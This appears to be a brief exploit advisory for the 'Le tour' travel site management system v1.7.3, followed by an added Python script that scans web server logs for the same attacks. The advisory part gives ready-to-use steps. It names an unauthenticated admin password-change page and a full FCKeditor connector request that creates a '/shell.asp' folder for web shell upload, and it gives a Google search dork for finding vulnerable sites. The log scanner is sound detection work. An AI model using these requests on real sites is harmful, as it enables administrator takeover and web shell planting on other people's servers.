Vulnerable program: Le tour travel site management system v1.7.3
Affected versions: v1.7.3

The exploit procedure:

First: Admin_Passod.asp in the admin directory.
This file is used to change the password, but the author did not put any access restriction on it, so it can be used to change the administrator password. Using it is very simple: open http://www.xxx.com/admin/Admin_Passod.asp
Second: FCK (FCKeditor) upload vulnerability, which has recently been seen in a lot of programs.
http://www.xxx.com/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
The official website is not affected by the first issue, for one of two reasons: one is that the back-end (admin) path was changed, the other is that the file was deleted.

Google search keyword: inurl:Plan_Show.asp?InfoId=
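
For site operators checking whether either request above has already been made against their installation, the following is an added example (not part of the original advisory or of the product's code) that scans web server logs for both patterns. The seven-field log layout, the sample lines and the rule names are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample lines (not real traffic), assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2024-01-01 10:00:01 192.0.2.10 GET /Plan_Show.asp InfoId=12 200
2024-01-01 10:00:05 198.51.100.7 POST /admin/Admin_Passod.asp - 200
2024-01-01 10:00:09 198.51.100.7 GET /fckeditor/editor/filemanager/connectors/asp/connector.asp Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1 200
2024-01-01 10:00:12 192.0.2.10 GET /fckeditor/editor/filemanager/connectors/asp/connector.asp Command=GetFolders&Type=Image&CurrentFolder=%2F 200
"""

# Folder names that end in a server-side script extension, e.g. "/shell.asp"
SCRIPT_EXT = re.compile(r"\.(asp|aspx|asa|cer|cdx)/?$", re.IGNORECASE)


def scan(log_text):
    """Return (client_ip, rule, detail) for each request matching the advisory."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) != 7:
            continue  # skip W3C header lines and malformed rows
        _date, _time, ip, _method, stem, query, _status = fields
        path = unquote(stem).lower()
        # parse_qs percent-decodes values; keys are lowercased for matching
        params = {k.lower(): v for k, v in parse_qs(query).items()}
        if path.endswith("/admin_passod.asp"):
            # The page has no access check, so every hit needs review by source.
            findings.append((ip, "password-page", stem))
        elif path.endswith("/connectors/asp/connector.asp"):
            command = params.get("command", [""])[0].lower()
            folders = params.get("currentfolder", []) + params.get("newfoldername", [])
            for folder in folders:
                if command == "createfolder" and SCRIPT_EXT.search(folder):
                    findings.append((ip, "fck-createfolder", folder))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
```

Hits on the password page from addresses that never logged in to the admin area, and any folder-creation hit, are the entries to investigate first.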